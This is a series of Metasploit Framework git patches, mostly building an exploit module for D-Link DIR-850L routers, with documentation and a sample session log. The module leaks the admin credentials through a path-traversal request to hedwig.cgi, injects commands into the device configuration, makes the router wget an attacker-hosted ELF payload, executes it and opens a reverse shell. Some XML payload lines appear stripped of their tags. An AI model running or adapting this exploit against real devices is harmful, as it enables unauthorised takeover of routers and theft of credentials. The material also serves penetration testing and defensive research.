++++++++++++++----- 1 file changed, 27 insertions(+), 10 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/payload.rb b/lib/msf/ui/console/command_dispatcher/payload.rb index bab4065d70..20b223f266 100644 --- a/lib/msf/ui/console/command_dispatcher/payload.rb +++ b/lib/msf/ui/console/command_dispatcher/payload.rb @@ -153,22 +153,39 @@ module Msf end def cmd_generate_tabs(str, words) + fmt = { + '-b' => [ true ], + '-E' => [ nil, ], + '-e' => [ framework.encoders.map { |refname, mod| refname } ], + '-h' => [ nil, ], + '-o' => [ true, ], + '-s' => [ true, ], + '-f' => [ :file, ], + '-t' => [ @@supported_formats, ], + '-p' => [ true, ], + '-k' => [ nil, ], + '-x' => [ :file, ], + '-i' => [ true, ] + } + tab_complete_spec(fmt, str, words) + end + + def tab_complete_spec(fmt, str, words) last_word = words[-1] - fmt = @@generate_opts.fmt fmt = fmt.select { |key, value| last_word == key || !words.include?(key) } - option = fmt[last_word] - return fmt.keys if !option || !option[0] + val = fmt[last_word] + return fmt.keys if !val # the last word does not look like a fmtspec + arg = val[0] + return fmt.keys if !arg # the last word is a fmtspec that takes no argument tabs = [] - case last_word - when '-e' - tabs = framework.encoders.map { |refname, mod| refname } - when '-f' - tabs = tab_complete_filenames(str, words) - when '-t' - tabs = @@supported_formats + if arg.to_s.to_sym == :file + tabs = tab_complete_filenames(str, words) + elsif arg.kind_of?(Array) + tabs = arg.map {|a| a.to_s} end + tabs end end end From 70033e2b94642a66e50bd04bed84750a9403fcdb Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Thu, 2 Nov 2017 12:31:54 -0400 Subject: [PATCH 086/254] Enable the payload handler by default --- modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb | 4 ++-- modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb | 1 - 2 files changed, 2 insertions(+), 3 deletions(-) diff --git a/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb b/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb index a91c80694e..9651e72307 100644 --- a/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb +++ b/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb @@ -47,7 +47,8 @@ class MetasploitModule < Msf::Exploit::Remote ], 'DefaultOptions' => { - 'EXITFUNC' => 'process' + 'EXITFUNC' => 'process', + 'DisablePayloadHandler' => true }, 'Arch' => [ARCH_X86, ARCH_X64], 'Payload' => @@ -76,7 +77,6 @@ class MetasploitModule < Msf::Exploit::Remote register_advanced_options( [ - OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', true]), OptString.new('LnkComment', [true, 'The comment to use in the generated LNK file', 'Manage Flash Player Settings']), OptString.new('LnkDisplayName', [true, 'The display name to use in the generated LNK file', 'Flash Player']) ] diff --git a/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb b/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb index bfc4fc71ba..312d43b18b 100644 --- a/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb +++ b/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb @@ -79,7 +79,6 @@ class MetasploitModule < Msf::Exploit::Local register_advanced_options( [ - OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', true]), OptString.new('LnkComment', [true, 'The comment to use in the generated LNK file', 'Manage Flash Player Settings']), OptString.new('LnkDisplayName', [true, 'The display name to use in the generated LNK file', 'Flash Player']) ] From a14102083ca7871e03c1be709289ff1d8f785fa1 Mon Sep 17 00:00:00 2001 From: Metasploit Date: Thu, 2 Nov 2017 10:01:12 -0700 Subject: [PATCH 087/254] Bump version of framework to 4.16.15 --- Gemfile.lock | 14 +++++++------- lib/metasploit/framework/version.rb | 2 +- 2 files changed, 8 insertions(+), 8 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 5a57421014..4d5a45de98 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,7 +1,7 @@ PATH remote: . specs: - metasploit-framework (4.16.14) + metasploit-framework (4.16.15) actionpack (~> 4.2.6) activerecord (~> 4.2.6) activesupport (~> 4.2.6) @@ -130,25 +130,25 @@ GEM google-protobuf (3.4.1.1) googleapis-common-protos-types (1.0.0) google-protobuf (~> 3.0) - googleauth (0.5.3) + googleauth (0.6.1) faraday (~> 0.12) - jwt (~> 1.4) + jwt (>= 1.4, < 3.0) logging (~> 2.0) memoist (~> 0.12) multi_json (~> 1.11) os (~> 0.9) signet (~> 0.7) - grpc (1.7.0) + grpc (1.7.2) google-protobuf (~> 3.1) googleapis-common-protos-types (~> 1.0.0) - googleauth (~> 0.5.1) + googleauth (>= 0.5.1, < 0.7) hashery (2.1.2) i18n (0.9.0) concurrent-ruby (~> 1.0) jsobfu (0.4.2) rkelly-remix json (2.1.0) - jwt (1.5.6) + jwt (2.1.0) little-plugger (1.1.4) logging (2.2.2) little-plugger (~> 1.1) @@ -378,4 +378,4 @@ DEPENDENCIES yard BUNDLED WITH - 1.15.4 + 1.16.0 diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb index 9690195ec5..88b837dc2f 100644 --- a/lib/metasploit/framework/version.rb +++ b/lib/metasploit/framework/version.rb @@ -30,7 +30,7 @@ module Metasploit end end - VERSION = "4.16.14" + VERSION = "4.16.15" MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i } PRERELEASE = 'dev' HASH = get_hash From 61a67efb826f02815341dc9825f74ee852509852 Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Thu, 2 Nov 2017 15:53:09 -0400 Subject: [PATCH 088/254] annnd....it sucks --- .../linux/http/dlink_850l_unauth_exec.rb | 165 ++++++++++++++++++ 1 file changed, 165 insertions(+) create mode 100644 modules/exploits/linux/http/dlink_850l_unauth_exec.rb diff --git a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb new file mode 100644 index 0000000000..181cbb1784 --- /dev/null +++ b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb @@ -0,0 +1,165 @@ +require 'openssl' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'DIR-850L (Un)authenticated OS Command Exec', + 'Description' => %q{ + This module leverages an unauthenticated credential disclosure + vulneralbility to then execute arbitrary commands on DIR-850L routers + as an authenticated user. Unable to use Meterpreter payloads, or + any other payload besides linux/mipsbe/shell/reverse_tcp & occasionally + linux/mipsbe/shell_reverse_tcp. + }, + 'Author' => [ + 'Mumbai ' # module + ], + 'References' => [ + ['URL', 'https://www.seebug.org/vuldb/ssvid-96333'], + ['URL', 'https://blogs.securiteam.com/index.php/archives/3310'], + ], + 'DisclosureDate' => 'Aug 9 2017', + 'License' => MSF_LICENSE, + 'Platform' => 'linux', + 'Arch' => ARCH_MIPSBE, + 'DefaultTarget' => 0, + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/mipsbe/shell/reverse_tcp' + }, + 'Privileged' => true, + 'Payload' => { + 'DisableNops' => true, + }, + 'Targets' => [[ 'Automatic', {} ]], + )) + end + + def retrieve_creds + begin + xml = "\r\n" + xml << "\r\n" + xml << "\r\n" + xml << " ../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml\r\n" + xml << "\r\n" + xml << "" + uid = rand_text_alpha_lower(8) + res = send_request_cgi({ + 'uri' => '/hedwig.cgi', + 'method' => 'POST', + 'encode_params' => false, + 'headers' => { + 'Accept-Encoding' => 'gzip, deflate', + 'Accept' => '*/*' + }, + 'ctype' => 'text/xml', + 'cookie' => "uid=#{uid}", + 'data' => xml, + }) + parse = res.get_xml_document + username = parse.at('//name').text + password = parse.at('//password').text + return username, password + rescue ::Rex::ConnectionError + fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.") + end + end + + def retrieve_uid + begin + res = send_request_cgi({ + 'uri' => '/authentication.cgi', + 'method' => 'GET', + }) + parse = res.get_json_document + uid = parse['uid'] + challenge = parse['challenge'] + return uid, challenge + rescue ::Rex::ConnectionError + fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.") + end + end + + def hash_passwd(username, password, challenge) + hash = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('md5'), password.to_s, (username.to_s + challenge.to_s)).upcase + return hash + end + + def login(username, hash, uid) + begin + data = "id=#{username}&password=#{hash}" + res = send_request_cgi({ + 'uri' => '/authentication.cgi', + 'method' => 'POST', + 'data' => data, + 'cookie' => "uid=#{uid}" + }) + return res + rescue ::Rex::ConnectionError + fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.") + end + end + + def execute_command(cmd, opts) + username, password = retrieve_creds + uid, challenge = retrieve_uid + hash = hash_passwd(username, password, challenge) + login(username, hash, uid) + payload = "\r\n" + payload << "\r\n" + payload << "\r\n" + payload << " DEVICE.TIME\r\n" + payload << " \r\n" + payload << " \r\n" + payload << "\r\n" + payload << "" + begin + res = send_request_cgi({ + 'uri' => '/hedwig.cgi', + 'method' => 'POST', + 'ctype' => 'text/xml', + 'data' => payload, + 'cookie' => "uid=#{uid}" + }) + res = send_request_cgi({ + 'uri' => '/pigwidgeon.cgi', + 'method' => 'POST', + 'data' => 'ACTIONS=SETCFG,ACTIVATE', + 'cookie' => "uid=#{uid}" + }) + rescue ::Rex::ConnectionError + fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.") + end + end + + + def exploit + print_status("#{peer} - Initiating exploitation...") + execute_cmdstager( + :flavor => :wget, + :background => true, + :nodelete => true + ) + end +end From 429ac71a63e438687278cd0259c63d0dfd812c49 Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Thu, 2 Nov 2017 15:53:45 -0400 Subject: [PATCH 089/254] header --- modules/exploits/linux/http/dlink_850l_unauth_exec.rb | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb index 181cbb1784..0efbe59d9c 100644 --- a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb +++ b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb @@ -1,3 +1,8 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + require 'openssl' class MetasploitModule < Msf::Exploit::Remote From caad1bbf271f27cbd22334bb2cc5e1288bc4d6a0 Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Thu, 2 Nov 2017 15:54:45 -0400 Subject: [PATCH 090/254] Create dlink_dir850l_unauth_exec.md --- .../linux/http/dlink_dir850l_unauth_exec.md | 40 +++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 documentation/modules/exploit/linux/http/dlink_dir850l_unauth_exec.md diff --git a/documentation/modules/exploit/linux/http/dlink_dir850l_unauth_exec.md b/documentation/modules/exploit/linux/http/dlink_dir850l_unauth_exec.md new file mode 100644 index 0000000000..dc8863c9d1 --- /dev/null +++ b/documentation/modules/exploit/linux/http/dlink_dir850l_unauth_exec.md @@ -0,0 +1,40 @@ +The module dlink_dir850_(un)auth_exec leverages an unauthenticated credential disclosure vulneralbility to then execute arbitrary commands via an authenticated OS command injection +vulneralbility. D-LINK 850L (excluding "Cloud" models) devices with firmware version up to 1.14B07 +are potentially vulnerable. The vulneralbility seems to occur within the parsing of the config. Another PoC can be found here https://www.seebug.org/vuldb/ssvid-96333. Setting command to be `reboot` will force the router into an infinite loop. + +## Vulnerable Application + + + 1. Start msfconsole + 2. Do : `use exploit/linux/http/dlink_dir850l_unauth_exec.rb` + 3. Do : `set RHOST [RouterIP]` + 4. Do : `set PAYLOAD linux/mipsle/shell/reverse_tcp` + 5. Do : `run` + 6. If router is vulnerable, payload should be dropped via wget and executed, and therein should obtain an session + + +## Example + +``` +msf > use exploit/linux/http/dlink_850l_unauth_exec +msf exploit(dlink_850l_unauthenticated_exec) > set RHOST 192.168.0.14 +RHOST => 192.168.0.14 +msf exploit(dlink_850l_unauthenticated_exec) > set RPORT 80 +RPORT => 80 +msf exploit(dlink_850l_unauthenticated_exec) > set LHOST ens3 +LHOST => ens3 +msf exploit(dlink_850l_unauthenticated_exec) > set LPORT 1351 +LPORT => 1351 +msf exploit(dlink_850l_unauthenticated_exec) > run + +[*] Started reverse TCP handler on 192.168.0.11:1351 +[*] 192.168.0.14:80 - Initiating exploitation... +[*] Using URL: http://0.0.0.0:80/Muw2WNUEmsAlcdl +[*] Local IP: http://192.168.0.11:80/Muw2WNUEmsAlcdl +[*] 192.168.0.14:80 - Retrieving uid and auth challenge... +[*] Command Stager progress - 100.00% done (101/101 bytes) +[*] Client 192.168.0.14 (Wget) requested /Muw2WNUEmsAlcdl +[*] Sending payload to 192.168.0.14 (Wget) +[*] Command shell session 2 opened (192.168.0.11:1351 -> 192.168.0.14:55167) at 2017-11-02 15:37:06 -0400 +[*] Server stopped. +``` From 5b7d803f85c5e872bd0fddb7894aed91e2d4e990 Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Thu, 2 Nov 2017 15:57:03 -0400 Subject: [PATCH 091/254] Update dlink_850l_unauth_exec.rb --- modules/exploits/linux/http/dlink_850l_unauth_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb index 0efbe59d9c..8f05f151f1 100644 --- a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb +++ b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb @@ -6,7 +6,7 @@ require 'openssl' class MetasploitModule < Msf::Exploit::Remote - Rank = ExcellentRanking + Rank = AverageRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager From af583e843c5e464e5cc29ec507ce9335a06d0a16 Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Fri, 3 Nov 2017 06:21:59 -0400 Subject: [PATCH 092/254] Update dlink_850l_unauth_exec.rb --- .../linux/http/dlink_850l_unauth_exec.rb | 40 +++++++------------ 1 file changed, 15 insertions(+), 25 deletions(-) diff --git a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb index 8f05f151f1..70e1f8e5db 100644 --- a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb +++ b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb @@ -1,12 +1,7 @@ -## -# This module requires Metasploit: https://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - require 'openssl' class MetasploitModule < Msf::Exploit::Remote - Rank = AverageRanking + Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager @@ -49,7 +44,7 @@ class MetasploitModule < Msf::Exploit::Remote xml = "\r\n" xml << "\r\n" xml << "\r\n" - xml << " ../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml\r\n" + xml << " ../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml\r\n" xml << "\r\n" xml << "" uid = rand_text_alpha_lower(8) @@ -68,6 +63,7 @@ class MetasploitModule < Msf::Exploit::Remote parse = res.get_xml_document username = parse.at('//name').text password = parse.at('//password').text + vprint_status("#{peer} - Retrieved the username/password combo #{username}/#{password}") return username, password rescue ::Rex::ConnectionError fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.") @@ -89,31 +85,25 @@ class MetasploitModule < Msf::Exploit::Remote end end - def hash_passwd(username, password, challenge) - hash = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('md5'), password.to_s, (username.to_s + challenge.to_s)).upcase - return hash - end - - def login(username, hash, uid) + def login + username, password = retrieve_creds + uid, challenge = retrieve_uid begin - data = "id=#{username}&password=#{hash}" + hash = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('md5'), password.to_s, (username.to_s + challenge.to_s)).upcase res = send_request_cgi({ 'uri' => '/authentication.cgi', 'method' => 'POST', - 'data' => data, + 'data' => "id=#{username}&password=#{hash}", 'cookie' => "uid=#{uid}" }) - return res + return uid rescue ::Rex::ConnectionError fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.") end end def execute_command(cmd, opts) - username, password = retrieve_creds - uid, challenge = retrieve_uid - hash = hash_passwd(username, password, challenge) - login(username, hash, uid) + uid = login payload = "\r\n" payload << "\r\n" payload << "\r\n" @@ -123,7 +113,7 @@ class MetasploitModule < Msf::Exploit::Remote payload << " \r\n" payload << " 1\r\n" payload << " 604800\r\n" - payload << " metelesku; (#{cmd};) & exit; \r\n" + payload << " #{Rex::Text.rand_text_alpha_lower(8)}; (#{cmd}) \r\n" payload << " \r\n" payload << " \r\n" payload << " 1\r\n" @@ -140,13 +130,15 @@ class MetasploitModule < Msf::Exploit::Remote payload << "\r\n" payload << "" begin + # save configuration res = send_request_cgi({ 'uri' => '/hedwig.cgi', 'method' => 'POST', 'ctype' => 'text/xml', 'data' => payload, 'cookie' => "uid=#{uid}" - }) + }) + # execute configuration res = send_request_cgi({ 'uri' => '/pigwidgeon.cgi', 'method' => 'POST', @@ -162,9 +154,7 @@ class MetasploitModule < Msf::Exploit::Remote def exploit print_status("#{peer} - Initiating exploitation...") execute_cmdstager( - :flavor => :wget, - :background => true, - :nodelete => true + :flavor => :wget ) end end From 8c0da8ea9000d0a7fc9d4ff45c8989e5c810fe87 Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Fri, 3 Nov 2017 06:24:07 -0400 Subject: [PATCH 093/254] Update dlink_850l_unauth_exec.rb --- modules/exploits/linux/http/dlink_850l_unauth_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb index 70e1f8e5db..f718fa85d7 100644 --- a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb +++ b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb @@ -1,7 +1,7 @@ require 'openssl' class MetasploitModule < Msf::Exploit::Remote - Rank = ExcellentRanking + Rank = GreatRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager From 705c1cc6a70fefb05bd62fa1d7bddf05dbc07e66 Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Fri, 3 Nov 2017 08:33:42 -0400 Subject: [PATCH 094/254] Redo Functions --- .../linux/http/dlink_850l_unauth_exec.rb | 172 ++++++++++++++++-- 1 file changed, 160 insertions(+), 12 deletions(-) diff --git a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb index f718fa85d7..498c6691ec 100644 --- a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb +++ b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb @@ -1,10 +1,17 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + require 'openssl' class MetasploitModule < Msf::Exploit::Remote - Rank = GreatRanking + Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient - include Msf::Exploit::CmdStager + include Msf::Exploit::Remote::HttpServer + include Msf::Exploit::Remote::EXE + include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, @@ -37,6 +44,14 @@ class MetasploitModule < Msf::Exploit::Remote }, 'Targets' => [[ 'Automatic', {} ]], )) + + register_options( + [ + OptAddress.new('DOWNHOST', [ false, 'An alternative host to requst the ARMLE payload from' ]), + OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]), + OptInt.new('HTTP_DELAY', [ true, 'Time that the HTTP Server will wait for the ELF payload request', 60]), + OptInt.new('CONNECTBACK_DELAY', [ true, 'Time to wait for shell to connect back to attacker', 10]) + ]) end def retrieve_creds @@ -63,7 +78,7 @@ class MetasploitModule < Msf::Exploit::Remote parse = res.get_xml_document username = parse.at('//name').text password = parse.at('//password').text - vprint_status("#{peer} - Retrieved the username/password combo #{username}/#{password}") + vprint_good("#{peer} - Retrieved the username/password combo #{username}/#{password}") return username, password rescue ::Rex::ConnectionError fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.") @@ -85,8 +100,7 @@ class MetasploitModule < Msf::Exploit::Remote end end - def login - username, password = retrieve_creds + def login(username, password) uid, challenge = retrieve_uid begin hash = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('md5'), password.to_s, (username.to_s + challenge.to_s)).upcase @@ -102,8 +116,8 @@ class MetasploitModule < Msf::Exploit::Remote end end - def execute_command(cmd, opts) - uid = login + def execute(cmd, username, password) + uid = login(username, password) payload = "\r\n" payload << "\r\n" payload << "\r\n" @@ -113,7 +127,7 @@ class MetasploitModule < Msf::Exploit::Remote payload << " \r\n" payload << " 1\r\n" payload << " 604800\r\n" - payload << " #{Rex::Text.rand_text_alpha_lower(8)}; (#{cmd}) \r\n" + payload << " #{Rex::Text.rand_text_alpha_lower(8)}; (#{cmd}); \r\n" payload << " \r\n" payload << " \r\n" payload << " 1\r\n" @@ -145,6 +159,7 @@ class MetasploitModule < Msf::Exploit::Remote 'data' => 'ACTIONS=SETCFG,ACTIVATE', 'cookie' => "uid=#{uid}" }) + return res rescue ::Rex::ConnectionError fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.") end @@ -152,9 +167,142 @@ class MetasploitModule < Msf::Exploit::Remote def exploit - print_status("#{peer} - Initiating exploitation...") - execute_cmdstager( - :flavor => :wget - ) + + # + # Information Retrieval, obtains creds and logs in + # + username, password = retrieve_creds + + downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8)) + + @pl = generate_payload_exe + @elf_sent = false + + # HTTP Server + resource_uri = '/' + downfile + if (datastore['DOWNHOST']) + service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri + else + # no ssl... + if datastore['SSL'] + ssl_restore = true + datastore['SSL'] = false + end + + # + # Service URL + # + if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::") + srv_host = Rex::Socket.source_address(rhost) + else + srv_host = datastore['SRVHOST'] + end + + service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri + + # + # Retrieve UID from target after authentication + # + + print_status("#{peer} - Starting up web service #{service_url}") + + start_service({'Uri' => { + 'Proc' => Proc.new { |cli, req| + on_request_uri(cli, req) + }, + 'Path' => resource_uri + }}) + + datastore['SSL'] = true if ssl_restore + end + + + # + # Requests target to download payload + # + print_status("#{peer} - Asking target to request to download #{service_url}") + + filename = rand_text_alpha_lower(8) + + cmd = "wget #{service_url} -O /tmp/#{filename}" + res = execute(cmd, username, password) + if (!res) + fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload") + end + + if (datastore['DOWNHOST']) + print_status("#{peer} - Giving #{datastore['HTTP_DELAY']} seconds to the device to download the payload") + select(nil, nil, nil, datastore['HTTP_DELAY']) + else + wait_for_linux_payload + end + register_file_for_cleanup("/tmp/#{filename}") + + + # + # Sets binary permissions to executable + # + cmd = "chmod 777 /tmp/#{filename}" + print_status("#{peer} - Requesting device to chmod #{downfile}") + res = execute(cmd, username, password) + if (!res) + fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload") # fannccyyy + end + + # + # Executes binary on target + # + cmd = "/tmp/#{filename}" + print_status("#{peer} - Requesting device to execute #{downfile}") + res = execute(cmd, username, password) + if (!res) + fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload") + end + wait_for_connect + end + + + # + # Handler for web server payload delivery + # + def on_request_uri(cli, request) + if (not @pl) + print_error("#{peer} - A request came in, but the payload was not ready") + return + end + print_status("#{peer} - Sending payload to the server...") + @elf_sent = true, + send_response(cli, @pl) + end + + # + # Waits for shell to connect back to us, otherwise server stops and nothing is returned + # + def wait_for_connect + print_status("#{peer} - Waiting for shell to connect back to us...") + waited = 0 + while (@elf_sent) + select(nil, nil, nil, 1) + waited += 1 + if (waited > datastore['CONNECTBACK_DELAY']) + fail_with(Failure::Unknown, "#{peer} - Shell never connected to us!, disconnect?") + end + end + end + + # + # Waits for target to request payload + # + def wait_for_linux_payload + print_status("#{peer} - Waiting for target to request the ELF payload...") + + waited = 0 + while (not @elf_sent) + select(nil, nil, nil, 1) + waited += 1 + if (waited > datastore['HTTP_DELAY']) + fail_with(Failure::Unknown, "#{peer} - Target didn't request the ELF payload - Maybe it can't connect back?") # ;-; + end + end end end From 32a75e978240a5e66d3c940c6941ac8f517f244a Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Fri, 3 Nov 2017 09:02:48 -0400 Subject: [PATCH 095/254] Update dlink_850l_unauth_exec.rb --- .../linux/http/dlink_850l_unauth_exec.rb | 40 +++++++++---------- 1 file changed, 20 insertions(+), 20 deletions(-) diff --git a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb index 498c6691ec..168fa8567d 100644 --- a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb +++ b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb @@ -121,26 +121,26 @@ class MetasploitModule < Msf::Exploit::Remote payload = "\r\n" payload << "\r\n" payload << "\r\n" - payload << " DEVICE.TIME\r\n" - payload << " \r\n" - payload << " \r\n" + payload << " DEVICE.TIME\r\n" + payload << " \r\n" + payload << " \r\n" payload << "\r\n" payload << "" begin From 40bcb3f0c8846e67b6ce61758f7115bd91c5b2a5 Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Fri, 3 Nov 2017 09:09:51 -0400 Subject: [PATCH 096/254] update documentation --- .../linux/http/dlink_dir850l_unauth_exec.md | 53 +++++++++++++++---- 1 file changed, 44 insertions(+), 9 deletions(-) diff --git a/documentation/modules/exploit/linux/http/dlink_dir850l_unauth_exec.md b/documentation/modules/exploit/linux/http/dlink_dir850l_unauth_exec.md index dc8863c9d1..fac596348e 100644 --- a/documentation/modules/exploit/linux/http/dlink_dir850l_unauth_exec.md +++ b/documentation/modules/exploit/linux/http/dlink_dir850l_unauth_exec.md @@ -16,7 +16,7 @@ are potentially vulnerable. The vulneralbility seems to occur within the parsing ## Example ``` -msf > use exploit/linux/http/dlink_850l_unauth_exec +msf > use exploit/linux/http/dlink_dir850l_unauth_exec msf exploit(dlink_850l_unauthenticated_exec) > set RHOST 192.168.0.14 RHOST => 192.168.0.14 msf exploit(dlink_850l_unauthenticated_exec) > set RPORT 80 @@ -26,15 +26,50 @@ LHOST => ens3 msf exploit(dlink_850l_unauthenticated_exec) > set LPORT 1351 LPORT => 1351 msf exploit(dlink_850l_unauthenticated_exec) > run +[*] Exploit running as background job 0. [*] Started reverse TCP handler on 192.168.0.11:1351 -[*] 192.168.0.14:80 - Initiating exploitation... -[*] Using URL: http://0.0.0.0:80/Muw2WNUEmsAlcdl -[*] Local IP: http://192.168.0.11:80/Muw2WNUEmsAlcdl -[*] 192.168.0.14:80 - Retrieving uid and auth challenge... -[*] Command Stager progress - 100.00% done (101/101 bytes) -[*] Client 192.168.0.14 (Wget) requested /Muw2WNUEmsAlcdl -[*] Sending payload to 192.168.0.14 (Wget) -[*] Command shell session 2 opened (192.168.0.11:1351 -> 192.168.0.14:55167) at 2017-11-02 15:37:06 -0400 +msf exploit(dlink_850l_unauthenticated_exec) > [*] 192.168.0.14:80 - Starting up web service http://192.168.0.11:80/kiRtmoNlSNHUnxO +[*] Using URL: http://0.0.0.0:80/kiRtmoNlSNHUnxO +[*] Local IP: http://192.168.0.11:80/kiRtmoNlSNHUnxO +[*] 192.168.0.14:80 - Asking target to request to download http://192.168.0.11:80/kiRtmoNlSNHUnxO +[*] 192.168.0.14:80 - Waiting for target to request the ELF payload... +[*] 192.168.0.14:80 - Sending payload to the server... +[*] 192.168.0.14:80 - Requesting device to chmod kiRtmoNlSNHUnxO +[*] 192.168.0.14:80 - Requesting device to execute kiRtmoNlSNHUnxO +[*] 192.168.0.14:80 - Waiting for shell to connect back to us... +[*] Sending stage (84 bytes) to 192.168.0.14 +[*] Command shell session 1 opened (192.168.0.11:1351 -> 192.168.0.14:48679) at 2017-11-03 09:05:13 -0400 +[+] Deleted /tmp/dhufstzw +sessions -i 1 +[*] Starting interaction with 1... + +3353690789 +yBvPAaTjxEjNJrrzHHdFNXGNWNywfECC +true +MhhOHvSRnLmxcFwdTiIdZFcHzGRAIhlA +mMzxldJdkNYWlIrHrOazzOcpCRTuRipt +OayNFBMDfTSaJIFwpNPoWErXCvLmIguK +[-] Exploit aborted due to failure: unknown: 192.168.0.14:80 - Shell never connected to us!, disconnect? [*] Server stopped. +pwd +/ +ls +www +var +usr +tmp +sys +sbin +proc +mydlink +mnt +lib +include +htdocs +home +etc +dev +bin + ``` From deb5a7b0151a8775f462ddce73c229940fb4dc1b Mon Sep 17 00:00:00 2001 From: Metasploit Date: Fri, 3 Nov 2017 10:03:38 -0700 Subject: [PATCH 097/254] Bump version of framework to 4.16.16 --- Gemfile.lock | 4 ++-- lib/metasploit/framework/version.rb | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 4d5a45de98..024c7dca5d 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,7 +1,7 @@ PATH remote: . specs: - metasploit-framework (4.16.15) + metasploit-framework (4.16.16) actionpack (~> 4.2.6) activerecord (~> 4.2.6) activesupport (~> 4.2.6) @@ 